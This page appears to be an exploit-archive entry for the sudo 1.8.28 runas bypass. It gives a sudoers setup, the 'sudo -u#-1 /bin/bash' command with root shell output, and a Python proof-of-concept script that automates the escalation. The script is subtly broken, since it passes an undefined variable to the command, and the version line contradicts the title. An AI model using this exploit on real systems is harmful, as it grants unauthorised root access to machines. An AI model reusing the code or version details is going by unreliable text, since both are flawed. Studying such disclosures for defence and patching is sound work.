sudo 1.8.28 Security Bypass

sudo version 1.8.28 suffers from a security bypass vulnerability.

MD5 | 6156d8a204112f3740a39ba32ccb9066

# Exploit Title : sudo 1.8.28 - Security Bypass
# Date : 2019-10-15
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam
# Version : Sudo <1.2.28
# Tested on Linux
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
# Fix : The bug is fixed in sudo 1.8.28
# CVE : N/A

'''Check for the user sudo permissions

sudo -l

User hacker may run the following commands on kali:
(ALL, !root) /bin/bash

So user hacker can't run /bin/bash as root (!root)

User hacker sudo privilege in /etc/sudoers

# User privilege specification

hacker ALL=(ALL,!root) /bin/bash

With ALL specified, user hacker can run the binary /bin/bash as any user


sudo -u#-1 /bin/bash

Example :

[email protected]:~$ sudo -u#-1 /bin/bash
[email protected]:/home/hacker# id
uid=0(root) gid=1000(hacker) groups=1000(hacker)
[email protected]:/home/hacker#

Description :
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root's id

and /bin/bash is executed with root permission
Proof of Concept Code :

How to use :



import os

#Get current username

username = input("Enter current username :")

#check which binary the user can run with sudo

os.system("sudo -l > priv")

os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")

binary_file = open("binary")


#execute sudo exploit

print("Lets hope it works")

os.system("sudo -u#-1 "+ binary)

Related Posts